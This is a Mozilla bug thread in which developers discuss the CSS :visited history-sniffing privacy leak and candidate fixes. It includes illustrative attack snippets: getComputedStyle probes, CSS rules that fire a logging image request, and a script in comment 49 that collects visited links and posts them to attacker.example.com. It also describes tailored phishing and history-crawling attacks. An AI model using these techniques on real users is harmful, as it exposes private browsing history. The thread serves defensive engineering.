Closed
Bug 147777
Opened 22 years ago
Closed 15 years ago
:visited support allows queries into global history
Categories
(Core :: CSS Parsing and Computation, defect, P1)
Tracking
Status: RESOLVED FIXED
Target Milestone: mozilla1.9.3a4
People
(Reporter: dbaron, Assigned: dbaron)
References
(Depends on 3 open bugs, Blocks 1 open bug)
Details
(Keywords: dev-doc-complete, privacy, Whiteboard: [sg:want P1][please read comments 12, 23, 35, 43, 65-68, 70, 102-103 before commenting])
Attachments
(33 files, 6 obsolete files)
Patches and text/html test cases ranging from 1.13 KB to 50.48 KB; reviews granted by bzbarsky, roc, zwol, bernd_mozilla, sdwilsh, and jwatt.
We should have a pref for :visited support, since there are some things that can
be determined about the user's history (and perhaps used for other exploits if
one knows they use one-click amazon purchasing, or a certain bank, etc.) using
:visited rules. (These include using GetComputedStyle or using generated
content or 'display: none' to cause server hits. The latter could be fixed with
a parallel style context tree (in limited cases), which could allow the pref to
disable rules only in author-level stylesheets, but that's quite a bit of work.)
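(For illustration, a minimal sketch of the getComputedStyle variant described above; the probed URL, the colors, and the element id are placeholders, and real exploits are more elaborate.)
<style>
  a:link    { color: rgb(0, 0, 238); }
  a:visited { color: rgb(255, 0, 0); }  /* distinctive "visited" color */
</style>
<a id="probe" href="http://example.org/some-page">probe</a>
<script>
  // If the computed color is the :visited color, the URL is in history.
  var color = window.getComputedStyle(document.getElementById("probe"), null)
                    .getPropertyValue("color");
  var visited = (color == "rgb(255, 0, 0)");
</script>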
Assignee | ||
Comment 1•22 years ago
|
||
s/latter/former/
Assignee | ||
Updated•22 years ago
|
Status: NEW → ASSIGNED
Priority: -- → P1
Target Milestone: --- → mozilla1.1beta
Assignee | ||
Updated•22 years ago
|
Target Milestone: mozilla1.1beta → mozilla1.1alpha
Assignee | ||
Comment 2•22 years ago
|
||
This is an untested implementation of the pref backend, with a pref name that I
don't like. (Suggestions for a better one?)
Assignee | ||
Comment 3•22 years ago
|
||
On second thoughts, perhaps a better option for users who really care about this
would be a pref to disable them only in author stylesheets to fix the content
loading issue, combined with disabling JS (and any other scripting language) to
fix the GetComputedStyle issue. This would have the major advantage that link
coloring would still work.
Comment 4•22 years ago
|
||
> ... with a pref name that I don't like. (Suggestions for a better one?)
browser.disable_visited_pseudoclass?
Assignee | ||
Comment 5•22 years ago
|
||
My comment "The latter could be fixed with a parallel style context tree (in
limited cases), which could allow the pref to disable rules only in author-level
stylesheets, but that's quite a bit of work." in comment 0 is incorrect, since
it doesn't fix issues with computed width/height/offsets or with things like
offsetTop.
Assignee | ||
Comment 6•22 years ago
|
||
However, one could make a pref that both disables :visited in author stylesheets
and hacks GetComputedStyle to fake the color (since that's the only thing in the
UA and presumably user stylesheets).
Comment 7•22 years ago
|
||
ew
Comment 8•22 years ago
|
||
Marking sensitive after discussing w/dbaron.
Unfortunately it appears impossible to resolve the privacy leak and fully obey
the spec at the same time.
Group: security?
Comment 9•22 years ago
|
||
That's OK, that's why this feature will be optional. The spec has a privacy
problem, so we let users choose to follow the spec or protect their privacy.
That's the best we can do apart from lobbying to change the spec.
Comment 10•22 years ago
|
||
In the old days surfing HTML was safe from this leak, and you still got to see
the colors on your links. The patch above turns off *all* visited styles, and that would break things so badly we couldn't do anything but default to current behavior. This might be a reasonable stopgap to check in just in case some big flap comes up, although since MS is also vulnerable, and it's really the spec's fault, we might not come under great pressure to fix this immediately.
If you're going to use the "browser" pref namespace, avoid sticking right on the root; it's too crowded already. Maybe something like browser.display.show_visited_style(s?)
There's also the dom namespace. This isn't exactly dom, though most of the leaks other than loading images would happen through the DOM. If we expect future CSS tweaks we could start browser.css.* or css.*
Assignee | ||
Updated•22 years ago
|
Summary: pref for :visited support → :visited support allows binary lookups in global history
Target Milestone: mozilla1.1alpha → mozilla1.1beta
Assignee | ||
Updated•22 years ago
|
Summary: :visited support allows binary lookups in global history → :visited support allows queries into global history
Assignee | ||
Comment 11•22 years ago
|
||
Assignee | ||
Comment 12•22 years ago
|
||
This is work in progress on a real fix for the exploit. This is only the first
(and easier) part of the patch. (It also needs more testing, but I'll test it
more once I have the whole thing.) This approach doesn't do any caching of the
special style contexts -- if I did, I'd have to worry about invalidation of the
cache, and that would be a real pain. It might be worth doing caching at some
point (and for nsComputedDOMStyle objects in general), but this shouldn't be
significantly slower in the normal (no :visited) case than the current
implementation. This patch should also fix a bunch of bugs in GetComputedStyle
returning the wrong data for content nodes that don't have frames or for
pseudo-elements.
The second part of the patch (not yet written) will be to do rule splitting of
some sort to prevent some properties from applying when the selector has
:visited. This will prevent exploits using specification of properties and use
of GetComputedStyle for properties where it looks at frame geometry, etc., or
use of offsetTop of the frame in question or for other frames. (For the time
being, this will have to block anything that can load an image, although in a
later patch I'd like to start loading background images from stylesheets and
then unblock background images, which I think are a legitimate style for
:visited links (as are :before images).)
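(The image-loading exploit referred to above needs no script at all; a minimal sketch with placeholder URLs, paired with a single <a id="probe" href="http://bank.example.com/"> element in the page:)
a#probe:visited {
  /* The logging request is sent only if the link target is in history. */
  background-image: url("http://log.example.com/visited?url=bank.example.com");
}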
Attachment #85392 -
Attachment is obsolete: true
Assignee | ||
Updated•22 years ago
|
Target Milestone: mozilla1.1beta → mozilla1.2alpha
Comment 13•22 years ago
|
||
(I take it you mean _pre_load _all_ background images from stylesheets, whether
they are used or not, rather than just loading background images, which we do
already, and which is the problem.)
This seems like an awfully large amount of code to work around an exploit which
is basically academic.
Comment 14•22 years ago
|
||
Hey Ian, come spend more time in "the land of the free". Back in the 50's
people's lives were ruined because they once checked a "communist" book out of a
library, and more recently people have been thrown in jail for giving money to a
charity that it turns out gave money to people who turned out to also support
terrorism. I don't think protecting history is being too paranoid. This could
easily be used for targeted snooping via e-mail.
Comment 15•22 years ago
|
||
I'm not saying we shouldn't do this. But to be honest, it isn't that easy to get
personal information out of the global history. You can do things like check if
the user has gone to a specific page (such as http://www.i-like-communism.com/)
but you can't do anything like get passwords out of the session history. Seems
to me that any scenario where this is going to be a problem is one where the
user is likely to be paranoid about using unencrypted plain text protocols and
having the history stored at all anyway. That kind of situation is probably best
worked around by using a "privacy mode" where the global history is not affected.
I think we should definitely fix this using dbaron's approach. dbaron's patch
looks bigger than it really is because he's moving code around.
We should also make this bug public given that every browser out there has the
same vulnerability (right?) and it's not TOO serious.
Ian: note that using this attack, someone can check to see if you've visited
https URLs as well as http URLs.
I can imagine, say, Amazon using this to see how many of their customers are
also visiting their competitors.
Depending on how the competitors' sites are organized, Amazon might even be able
to guess WHAT they're buying.
Assignee | ||
Comment 18•22 years ago
|
||
But that is only really one third of the patch, so far. I still need to do the
property blocking and the loading images from the stylesheet.
Comment 19•22 years ago
|
||
roc: I would be incredibly impressed if someone wrote an exploit of this bug
which got out more information than "you visited our competitor's site",
information which is frankly less of an issue than referrer-tracking.
Assignee | ||
Comment 20•22 years ago
|
||
This bug worries me because we don't really know the implications of knowing
that someone has recently visited a particular URL. It could be used in rather
subtle ways.
Therefore I'm marking "mustfix" which means we want a fix soon.
Whiteboard: [sg:mustfix]
Comment 22•22 years ago
|
||
David, we're still interested in getting a fix for this, probably for Moz 1.3.
Are you still working on this?
Assignee | ||
Comment 23•22 years ago
|
||
I've been thinking about this a bit. The second part of the patch (see comment
12) requires per-property knowledge. Implementing this in the current CSS
backend scares me, because everything is done in massive case statements instead
of using a preprocessable list of properties -- this makes it very easy to miss
properties, etc., especially when people start adding new properties. I'd be
much more comfortable doing this if the current CSS backend were cleaner.
I also still need to solve the puzzle of exactly how to expand selectors for
property blocking. It's clear that any selector using :visited doesn't apply
for the blocked properties. But what's the opposite? Do we turn all the :link
in other selectors into :-moz-any-link for the blocked properties, or one at a
time, or something else? I suspect the answer is all, but I haven't had time to
sit down and prove it to myself. (Consider selectors with multiple :link and
:visited separated by various combinators.)
This is also going to end up being a very complex patch that will need thorough
review. (After all, it would essentially create two new security systems, one
for property blocking (which is probably not a bad name -- I need to come up
with a better one) and one for lying during DOM access to unblocked properties.)
I'm tempted to include intentional mistakes in the patch and not accept the
reviews until the reviewers catch the intentional mistakes (and probably some
unintentional ones as well).
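(To make the selector-expansion puzzle concrete, a few hypothetical rules of the kind comment 23 worries about, where a blocked property sits behind several :link/:visited tests joined by different combinators:)
:visited + :link > span        { color: green; }  /* visited sibling, child of an unvisited link */
:link :visited span            { color: blue; }   /* visited link inside an unvisited link's subtree */
a:link ~ a:visited ~ a:link em { color: red; }    /* alternating states across sibling combinators */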
Comment 24•22 years ago
|
||
David, we'd really like to get that patch - can you give us an ETA? Maybe for
1.3 alpha?
Assignee | ||
Updated•22 years ago
|
Target Milestone: mozilla1.2alpha → mozilla1.3beta
Comment 25•22 years ago
|
||
*** Bug 57351 has been marked as a duplicate of this bug. ***
Comment 26•22 years ago
|
||
So... given that there's a public exploit of this bug at:
http://www.gemal.dk/browserspy/css.html
can this be made public?
Comment 28•21 years ago
|
||
Wouldn't loading all referenced images in the stylesheet solve part of this problem? This is already done for pieces of content that have been hidden using display:none.
This would prevent malicious site operators from looking at their logs to see which pages have been visited and which not.
Assignee | ||
Comment 29•21 years ago
|
||
That's part of the plan, in a sense, although if it's not done first those
properties could be "blocked". See comments above, I think, if I mentioned it...
Assignee | ||
Comment 30•21 years ago
|
||
(Yes, the end of comment 12.)
Assignee | ||
Updated•21 years ago
|
Target Milestone: mozilla1.3beta → mozilla1.5beta
Comment 31•21 years ago
|
||
*** Bug 223288 has been marked as a duplicate of this bug. ***
Comment 32•21 years ago
|
||
*** Bug 224954 has been marked as a duplicate of this bug. ***
Comment 33•21 years ago
|
||
http://lists.insecure.org/lists/bugtraq/2002/Feb/0271.html - a few words about possible uses of this hole.
Assignee | ||
Comment 34•21 years ago
|
||
Assignee | ||
Comment 35•21 years ago
|
||
This test shows that the approach I was originally planning to take is
insufficient. However, I think it would work if we always resolved both the
style-if-visited and style-if-unvisited. I can't see any way that the time
resolving the style on the descendants would be any different. Even if we keep
both around (which I think is necessary to prevent timing exploits like this
one), we can't use these (much, anyway) for GetComputedStyle, though, since
descendants would still have the correct (and tainted) inherited data.
Assignee | ||
Updated•21 years ago
|
Assignee | ||
Comment 36•20 years ago
|
||
A strategy for fixing this:
* make each style context have a mLinkNext pointer so everything that's a style
context now becomes a linked list of style contexts.
* each element that's not a link resolves each element of its list the same as
its parent
* each element that is a link resolves each element of its list the same as its
parent as if it's its correct link state, and then as if it's its opposite link
state
* we use bits somewhere to indicate which one of the elements in the list is
the "totally unvisited" state, and nsComputedDOMStyle uses that one
* every GetStyleData call resolves the style data on all style contexts in the
chain (and we need to make two calls for nsComputedDOMStyle so there's no
performance difference for unresolved data)
Assignee | ||
Comment 37•20 years ago
|
||
s/element/style context/g
Oh, and everything that loads URL values manually (rather than using
CSSValue::Image), e.g., -moz-binding, needs to load all the URLs in the chain.
Assignee | ||
Comment 38•20 years ago
|
||
... actually not. The things that load the URLs manually could still just do
the property blocking, which we still need to do in addition to the above (since
it only fixes (1) and (3)).
Assignee | ||
Comment 39•20 years ago
|
||
Oh, and we also need to be careful with HasStateDependentStyle and
HasAttributeDependentStyle -- they need to check for a change given any possible
link state.
Assignee | ||
Comment 40•20 years ago
|
||
And we also need to be careful to load the images in the same order whether or
not the links are visited.
Assignee | ||
Comment 41•20 years ago
|
||
We also need to either block sibling combinators with :link or :visited above or
turn them into :link-only.
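(A one-rule example of the sibling-combinator case, with placeholder URLs: the styled element is not a link at all, so the leak moves to its sibling.)
a#probe:visited + span {
  background-image: url("http://log.example.com/hit");
}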
Assignee | ||
Comment 42•20 years ago
|
||
There are also performance attacks possible related to a lot of specific
properties (e.g., transparency in images), so actually this approach is probably
overkill, since we don't need the linked list to start all the image loads.
Assignee | ||
Comment 43•20 years ago
|
||
Given that, I'm actually beginning to think that the only safe property is 'color'.
Comment 44•20 years ago
|
||
*** Bug 287481 has been marked as a duplicate of this bug. ***
Comment 45•19 years ago
|
||
(In reply to comment #43)
> Given that, I'm actually beginning to think that the only safe property is 'color'.
Sorry for my possibly amateur approach (no C++), but I think that you are digging from the wrong side of the hill.
This vulnerability is exposed by some style properties of links pointing to outside domains. So the solution should be not to block their functionality, but to block read access to the properties of outside links. I mean it should be the input-file / frame approach: you can set but you cannot read, even if you set it yourself. Something like:
onLinkStylePropertyChangeRequest:
    // everything as it is right now
onLinkStylePropertyReadRequest:
    if LinkInThisDomain:
        ReturnRequestedProperty
    else:
        RaiseSecurityException
Assignee | ||
Comment 46•19 years ago
|
||
The point is that there are many other ways to use this attack than reading the
link's properties.
Comment 47•19 years ago
|
||
(In reply to comment #46)
> The point is that there are many other ways to use this attack than reading
> the link's properties.
But only visited link properties are really a serious privacy flaw. It allows you to effectively check hundreds and thousands of links with almost *no* effect on the user's traffic and *without* queries to other sites.
Timed element loading is more a jeu d'esprit than a practical spying technology. Enormous traffic growth (plus visible requests to outside sites) makes it unusable. You have to be a desperate idiot and not a professional spy to jump on it. XMLHttpRequest works just as well for that, so should XMLHttpRequest be locked down too?
Visited link properties are an effective way to spy.
At the same time there is absolutely no way to block any of these properties if you want to keep your browser usable.
So I suppose the only way is to put all links within the current page into a FRAME-style sandbox: apply any styles you want, but if you want to read them back - then sorry, no.
And the W3C should get a text like "For security and privacy reasons read-access to link style properties *may be* restricted by a particular software producer if the link points outside of the current domain."
Send them this right now, let them start inserting it into the appropriate sub-paragraph, article XXXXXX, section YYYYYY or wherever, so everyone gets busy :-)
Comment 48•19 years ago
|
||
You can do:
#mozillaorg:visited{background:url(img)}
You could also do:
#mozillaorg:visited+span{color:green}
... and read the color of that span element through javascript. Etc.
Comment 49•19 years ago
|
||
Right, or you can use rules like
a.snoop span { display: none }
a.snoop:visited span { display:inline }
and then generate a pile of
<div id="foo">
<a class="snoop" href="http://www.funroll-loops.org">www.funroll-loops.org</a>
<a class="snoop" href="http://www.mozilla.org">www.mozilla.org</a>
...
</div>
and XMLHttpRequest-send document.getElementById("foo").innerHTML your way to
browsing history.
Or any of the other test cases attached to this bug which don't rely on directly
sampling via GetComputedStyle. None of those require extra traffic, or need to
be visible to the user in any way, other than the report-home mechanism common
to all such attacks.
dbaron wasn't kidding in comment 46.
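(A sketch of the report-home step just described, with a placeholder reporting URL; it checks offsetWidth of the spans rather than literally posting innerHTML, since the display:none/inline difference shows up in layout, not in the markup.)
<script>
  var links = document.getElementById("foo").getElementsByTagName("a");
  var visited = [];
  for (var i = 0; i < links.length; i++) {
    // A span under a visited .snoop link is rendered; under an unvisited one
    // it is display:none and has zero width.
    var span = links[i].getElementsByTagName("span")[0];
    if (span.offsetWidth > 0)
      visited.push(links[i].href);
  }
  var req = new XMLHttpRequest();
  req.open("POST", "http://attacker.example.com/report", true);
  req.send(visited.join("\n"));
</script>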
Assignee | ||
Comment 50•19 years ago
|
||
Did you even look at the testcases in attachment 135345 and attachment 135350?
(The latter isn't 100% reliable, but it could be improved.) Those only even
scratch the surface.
Comment 51•19 years ago
|
||
I'm pointing you again to my comment #47.
All these samples are using access to a:visited style properties. Actually I'm wondering why everyone got so fixated on colors? It must be the pressure of tradition, because it can be any style property: margin, padding, font, size etc. etc. I could fill this topic with hundreds of similar test cases.
Again, there are only two possible variants: either just leave it, or put an extra sandbox rule in the JavaScript engine (Set - any, Get - only properties of links within the current document.domain). The latter kills the problem at the root, but it's definitely W3C-sensitive.
Also all kinds of "timed loading" exploits should be removed from this and any other topic as irrelevant and unfixable. There is absolutely nothing you can do here without locking down 99% of browser functionality.
As a consolation I can say that this case is more an attempt to be "more catholic than the Pope". No DoubleClick-level spy will ever use any of these exploits, just as no mafia boss will start grabbing purses on the street. They have completely different techniques and approaches. The small net-trash can use it (and is using it), but what can you really expect from trash?
Comment 52•19 years ago
|
||
> All these samples are using access to a:visited style properties.
See comment 50, please. Again. Attachment 135345, for example, never accesses
a style property on an a:visited. Please stop with the uninformed advocacy, ok?
Comment 53•19 years ago
|
||
> See comment 50, please.
> Again. Attachment 135345, for example,
> never accesses a style property on an a:visited.
Wow! That's a proof of the 5th Parkinson-Murphy law!
I tried to play chess against myself and I lost every time. I see this flaw cannot be solved without a severe violation of the "browsing experience". Mark it as a "system feature"?
> Please stop with the uninformed advocacy, ok?
OK, no problem.
All I wanted to say is that IE is wide open to this exploit as well, so in the "Empire strikes back" attack it cannot be used against you. I had a nightmare that you have really woken up the Big M with your Firefox, and that it will use all your own defaults against you on All Spirits' Day. So maybe just skip it for now?
Updated•19 years ago
|
Whiteboard: [sg:mustfix] → [sg:fix]
Comment 54•19 years ago
|
||
Given the breadth of attacks here, and the tension between the CSS specification
and some of the restrictions proposed, moving this back to investigate.
Whiteboard: [sg:fix] → [sg:investigate]
Assignee | ||
Comment 55•19 years ago
|
||
Comment 56•19 years ago
|
||
Another approach would be to have :link/:visited elements have different z-indices and then use onmouseover to find out which elements got the events when the user swipes the mouse from side to side (trivial to induce if the user is playing a game, e.g.).
Updated•19 years ago
|
Whiteboard: [sg:investigate] → [sg:want P4]
Assignee | ||
Comment 57•18 years ago
|
||
For what it's worth, this is attachment 87324, modified with a code fork for WinIE (where it does not support a standard DOM method but supports an equivalent proprietary one). It shows that WinIE6 is vulnerable; I'm curious if the claims that this is fixed in IE7 are correct.
Assignee | ||
Comment 58•18 years ago
|
||
Actually, it seems that href="" also doesn't work on WinIE in some cases, which I think is an additional bug that makes all these testcases fail (say "exploit not present", even if it is) in WinIE. Since I can't predict the attachment URLs that I'm going to get, and since attachments are visible using multiple URLs, I'll use this bug's URL as a template for a visited URL.
Assignee | ||
Updated•18 years ago
|
Attachment #235461 -
Attachment is obsolete: true
Comment 59•18 years ago
|
||
see also http://jeremiahgrossman.blogspot.com/2006/08/i-know-what-youve-got-firefox.html
which shows how it's possible to detect some of the installed Firefox extensions using the chrome: protocol handler. I'm not sure if that is a security threat, but it's definitely a privacy issue.
Assignee | ||
Comment 60•18 years ago
|
||
Comment 59 does NOT belong on this bug. Please file it as a separate bug report.
Comment 61•18 years ago
|
||
http://crypto.stanford.edu/sameorigin/ references this bug, and their solution is to use the referer column in history (as implemented in bug 128398 ) to control access to the global history. This does seem to work, however I'll note that the referer is only set if the referer is currently blank - ie it's only set once per history entry.
Assignee | ||
Comment 62•18 years ago
|
||
*** Bug 354861 has been marked as a duplicate of this bug. ***
Comment 63•18 years ago
|
||
From dup bug:
Descr.: http://archives.neohapsis.com/archives/fulldisclosure/2006-09/0547.html
Paper: http://www.spidynamics.com/assets/documents/JS_SearchQueryTheft.pdf
Proof of Concept: http://www.spidynamics.com/spilabs/js-search/index.html
Comment 64•18 years ago
|
||
(In reply to comment #61)
> http://crypto.stanford.edu/sameorigin/ references this bug, and their solution
> is to use the referer column in history (as implemented in bug 128398 ) to
> control access to the global history. This does seem to work, however I'll note
> that the referer is only set if the referer is currently blank - ie it's only
> set once per history entry.
Actually, we modify the referer field to store a list of all referers, rather than just the first one.
Collin Jackson
Assignee | ||
Comment 65•18 years ago
|
||
So, for what it's worth, a CSS approach that would fix the known exploits here is, I think:
1. When computing style for visited links, use the style that matches :link, except for the RGB components (not the alpha component) of the color and background-color properties, where we use the style that matches :visited
2. Make getComputedStyle lie about those two properties (i.e., act as though the link is unvisited)
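(In page-script terms, the proposal above would mean roughly the following; colors and URL are placeholders.)
<style>
  a:link    { color: rgb(0, 0, 238); }
  a:visited { color: rgb(85, 26, 139); }
</style>
<a id="seen" href="http://example.org/visited-page">link</a>
<script>
  // The link may *render* with the :visited color, but getComputedStyle
  // answers as if the link were unvisited:
  var c = window.getComputedStyle(document.getElementById("seen"), null)
                .getPropertyValue("color");
  // c is "rgb(0, 0, 238)" whether or not the URL is in history.
</script>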
Comment 66•18 years ago
|
||
(In reply to comment #65)
> So, for what it's worth, a CSS approach that would fix the known exploits here
> is, I think:
It is true that these proposed changes make attacks more difficult and are likely to work well with most sites. Although I support these changes, I would like to point out that they don't fix all of the known exploits.
1) It would still be possible for an attacker to construct a convincing phishing page that looks like Wells Fargo to a Wells Fargo customer and Citibank to a Citibank customer. An attacker could simulate the images as a grid of 1 pixel hyperlinks, and simulating the text should be straightforward. JavaScript could be used to ensure that the user doesn't accidentally click through to the real site, and once the credentials have been stolen it would be straightforward to try them at both sites.
2) It would still be possible for an attacker to learn information about the user's history at other sites based on where they click and don't click. For example, an attacker could have a huge link that says "Click here" and only users with a certain history entry would see it and click it, because it blends in with the background otherwise.
Assignee | ||
Comment 67•18 years ago
|
||
Ah, right. Then I think we need to take a non-CSS approach to solving this, such as storing all referring domains to a link in global history, and only allowing styling if the page is in the referring domain.
(Would be great to have the effective-TLD-service for that, I suppose.)
Target Milestone: mozilla1.5beta → ---
Comment 68•18 years ago
|
||
I think I prefer the CSS approach. I don't mind if an attacker can find out whether I've visited a given page, one URL at a time, with user interaction (not cooperation). But I do want visited link coloring to work on all the blogs I visit, even if I haven't clicked a given link from that blog before.
Comment 69•18 years ago
|
||
Even if we fix this, another way is still available, see bug 363897
Comment 70•18 years ago
|
||
I'm with Jesse, the approach dbaron lays out would stop the wholesale testing of history in a hidden frame. It's a huge win even if it's not 100% foolproof.
Comment 71•18 years ago
|
||
Does the approach from comment 65 also take the following scenarios into account (and variants):
a:visited + span { color:blue }
a#bbc-co-uk:visited { background:url(tracker.cgi?bbc.co.uk) }
Comment 72•18 years ago
|
||
Compare bug 371375 with same or similar effect, but other method.
Comment 73•18 years ago
|
||
Not sure whether already reported here, but RSnake had an idea how to use this without JavaScript enabled, by combining CSS :visited with CSS background-image.
http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/
Assignee | ||
Comment 74•18 years ago
|
||
(In reply to comment #73)
> Not sure whether already reported here,
It is. See, e.g., comment 12 and comment 61.
Assignee | ||
Comment 75•18 years ago
|
||
er, sorry, comment 12 and comment 71.
Comment 76•18 years ago
|
||
Another site which demonstrates the problem:
http://gemal.dk/browserspy/css.html
Assignee | ||
Updated•18 years ago
|
QA Contact: ian → style-system
Comment 77•17 years ago
|
||
(In reply to comment #14)
> Hey Ian, come spend more time in "the land of the free". Back in the 50's
> people's lives were ruined because they once checked a "communist" book out of a
> library, and more recently people have been thrown in jail for giving money to a
> charity that it turns out gave money to people who turned out to also support
> terrorism. I don't think protecting history is being too paranoid. This could
> easily be used for targetted snooping via e-mail.
please do not make FF a pile of **** like IE!
But seriously, you're making a stupid assertion there. For instance, if you're browsing some forum and *give your email address* requesting a full set of some child porn or snuff, it is *your sole responsibility* to make sure you don't load any web bugs in email messages the feds send you, and no one should make any assumptions about what the end user's privacy preferences *might* be - or rather, privacy settings should be turned on, not turned off, by default.
Updated•17 years ago
|
Blocks: historyleak
Comment 78•17 years ago
|
||
I've been experimenting with this behaviour and found that you can do better than just guessing random URLs and seeing if they have been visited or not. The following method may be obvious, but I've not seen it talked about anywhere:
1. Guess a few starting URLs that the user is likely to have visited (e.g. planet.mozilla.org, slashdot.org, news.bbc.co.uk) and put them on a webpage.
2. Detect which URLs have been visited.
3. For each visited URL, make a background request to a server that will fetch a copy of the URL and return a list of links on that page.
4. Add those links to the current page.
5. Go to step 2.
Using this method, a website can interactively search through your history and find pages you've visited that couldn't be guessed easily (provided they're public webpages).
Another interesting thing that can be done since bug 78510 was fixed is to know in real time when someone clicks on a link. For example, you could visit a page that did the kind of tracking described above, then keep it open in a background tab. If I click on a story on slashdot that I've not read before, that link will immediately become 'visited' on the tracking page. The tracking page will then fetch all the links on that page. It could then follow me as I look at a wikipedia page linked from the comments, and any subsequent pages linked from there.
I've made a proof of concept of this (using only CSS, no JS required) and it works pretty well. Now that Firefox 3 stores 90 days of history, it can dig up a good number of pages I've visited.
Comment 79•17 years ago
|
||
This is an interesting idea.
It has two limitations, though: 1. it is resource-intensive, making it more likely to be noticed and detected, 2. you will only find pages linked (indirectly) from those popular pages. I.e. you will see which news I followed, but not the website of my friend, whose address I typed in the urlbar.
Creative exploit of this bug:
http://azarask.in/blog/post/socialhistoryjs/
Updated•16 years ago
|
Flags: wanted1.9.1?
Comment 81•16 years ago
|
||
Comment 82•16 years ago
|
||
Workaround till this is fixed is to use the SafeHistory extension from http://crypto.stanford.edu/sameorigin/stanford-safehistory-0.9.xpi
Comment 83•16 years ago
|
||
Hello,
Sorry to up this old topic after all this time. I would like to share some thoughts about this problem.
_First_, as someone said before, and given the importance of this issue (comment #78 explains very well, in my opinion, a scary way to exploit this, for example), I think we should "restrict" (see next point) by default the effect of the :visited pseudo-class on links to a different origin than the current page. Maybe we can add a preference to disable that privacy feature, if people still want the present functionality unrestricted.
A sort of "choose between privacy and functionality" preference. That way, users can still get the full site design on :visited links if they absolutely want it, but by restricting by default, and forcing the user to understand the implications of what they do before they allow the full functionality, we put the responsibility on the user to choose the fancier path instead of the safe one. In other words, if someone gets his history stolen after they allow it, they cannot say it's Mozilla's fault.
_Second_, as to the way of "restricting" :visited on foreign-domain links, I see a few, while keeping various levels of functionality:
1) As some people already suggested, just act as if those links were not visited, whether it's true or not. Certainly the safest path, and the easiest to implement, but again, we lose the functionality of knowing whether they are visited or not...
2) Ignore the CSS :visited pseudo-class on those foreign-domain links, and put the emphasis on the visited links in an arbitrary way chosen by the browser. It will be the same for every site, no matter what CSS there may be, and in a way that no script or CSS can know whether it was visited or not.
For example, you could add a little image with "position: absolute" on the right of the text links to show that it is visited, an image that could not be accessed by the DOM (or by CSS selectors, of course). Since it is absolutely positioned, it would not change the geometry of the document. You could as well invert the background color of the given link, or change the text-decoration, or whatever that doesn't change the geometry and the DOM of the document. Of course, for properties modified like this, getComputedStyle should not return the actual "real" value. This has the main advantage of still showing to the user which links he has visited or not, even if it is in an "ugly" way, that doesn't integrate very well with the visited site's design.
In other words, trade some design possibilities for privacy, while keeping the full functionality of showing visited links.
3) Allow a *white-list* based list of CSS properties that could be set for :visited links. Those properties could be set by the CSS for the links (or even any children or sibling element, depending on the selector used), but getComputedStyle should not be able to read it (it should read the value the property would have if the given link was treated as never visited). The white-list should be carefully chosen, from the properties that don't change the geometry of the document, for example color, background-color, background-image (in that case, it should be downloaded even if the person has not visited the link, of course), text-decoration, font-style (if we can assume that italic and oblique text always has the same width and height as "normal" text)...
This is a more flexible way, preserving most of the design possibilities for the site designers, while still letting the user know which links he has gone to.
It is also probably the hardest to implement of the three, because for example you need to keep track of what properties were set with CSS rules that depend on a :visited selector.
Also keep in mind that those restrictions (whatever way you choose) would only apply to links that point to foreign domains, so any site can still do whatever it wants with its own links.
Well, sorry, this was quite a long post, but I hope it can be helpful.
Comment 84•16 years ago
|
||
The thing is... doing that origin compare is likely to be expensive. For typical pages, "noticeably slower pageload" expensive, if I recall the numbers right for how many history lookups happen.
Comment 85•16 years ago
|
||
I don't understand the reason for all the comments about how it will change page layout, etc.
Let :visited do its thing on the page and restrict the _javascript_ from reading it! Simply pretend all different-origin visited links are unvisited when javascript reads them. This should break almost nothing - how often does javascript need to read such things?
Assignee | ||
Comment 86•16 years ago
|
||
(In reply to comment #85)
> Let the :visited do it's thing on the page and restrict the _javascript_ from
> reading it! Simply pretend all, different origin, visited links are unvisited
> when javascript reads them. This should break almost nothing - how often does
> javascript need to read such things?
Please read the 84 comments prior to yours to see why this won't work. (Sorry, I don't have time to find the right ones right now -- but that's what happens when the bug has too many comments on it.)
Comment 87•16 years ago
|
||
(In reply to comment #86)
> I don't have time to find the right ones right now -- but that's what happens
> when the bug has too many comments on it.)
>
I saw this many times, so I filed bug 451684
Flags: wanted1.9.1?
Flags: wanted1.9.1-
Flags: blocking1.9.1-
Comment 88•16 years ago
|
||
(In reply to comment #86)
> (In reply to comment #85)
> > Let the :visited do it's thing on the page and restrict the _javascript_
> > from reading it! [...]
>
> Please read the 84 comments prior to yours to see why this won't work
> I don't have time to find the right ones right now
Comment #73, comment #48, comment #49, comment #50: there might be some others before, but those are telling enough.
Comment 89•16 years ago
|
||
(In reply to comment #84)
> The thing is... doing that origin compare is likely to be expensive. For
> typical pages, "noticeably slower pageload" expensive, if I recall the numbers
> right for how many history lookups happen.
I think the approach Jordan Osete describes is probably the best... Only match :visited when the link has the same origin as the containing file. The code complexity would be minimal, the fix would be easy to implement and explain.
People would lose the ‘visited’ indication on links to foreign sites, which might be slightly annoying on sites like e.g. Digg, but you still keep the functionality on sites with many same-domain links such as blogs. Some kind of preference/per-page-setting would be useful, so that e.g. Thunderbird or NoScript can disable this limitation (given that they do not allow JS to execute in content), and people who do not care much for the security issue as well.
You say that adding a same-origin check causes considerable overhead, but by definition :visited itself needs to compare the link with the entire history (or at least a subset thereof)... surely that massively outweighs the overhead of a simple same-origin check (where you do not even have to compare the entire URI, just the domain part)?
If you really do want to cater to foreign links, you could implement the referer-thing mentioned in comment 61, which should suffice for all practical uses of :visited, although of course at a more significant performance trade-off. (But then again, one might consider the Referer HTTP header a security issue in its own right :), and if you are not going to 'fix' Referer, why would you bother with :visited?)
Another way to retain partial functionality for foreign links would be to set a flag on a link once it gets activated, so that at least as long as the page is not reloaded or still in the fastback-cache, the links show up as visited.
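(For concreteness, the same-origin gating being debated amounts to a check like the following, expressed as page-level JavaScript purely for illustration; the real decision would have to live in the style system.)
// An <a> element's .host property gives the host[:port] of its href, so the
// comparison does not require parsing the full URI.
function mayShowVisited(link) {
  return link.host == location.host;  // same host as the containing page
}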
Comment 90•16 years ago
|
||
Laurens, comparing "just the domain part" is actually more expensive than comparing the whole URI. And history is a database; it's not like we're doing a linear search through it.
In the past, something as simple as minor tweaks to URI parsing has significantly affected the :visited codepath's performance and had noticeable effects on pageload time. It's a _very_ hot codepath during pageload. I suggest you do some profiling and read some of the old bugs on the issue, or just talk to sdwilsh about the problems he's running into now with his history work.
Comment 91•16 years ago
|
||
Sorry, but I really do not understand why this would be slower.
I mean, currently we do a _full_ history lookup for EVERY link in the page.
With my proposal, we only do ONE origin compare for every link, and a full history lookup ONLY on those links that come from a same origin.
If anything, shouldn't it be faster?
Comment 92•16 years ago
|
||
